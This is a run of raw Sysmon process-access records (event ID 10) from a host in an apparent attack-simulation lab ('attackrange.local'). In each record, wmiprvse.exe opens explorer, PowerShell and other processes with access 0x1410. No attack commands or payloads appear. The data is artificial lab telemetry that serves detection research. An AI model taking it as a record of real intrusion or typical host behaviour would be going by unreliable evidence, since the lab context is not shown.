16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237591Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237590Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237589Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237588Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237587Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237586Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237585Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.903{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 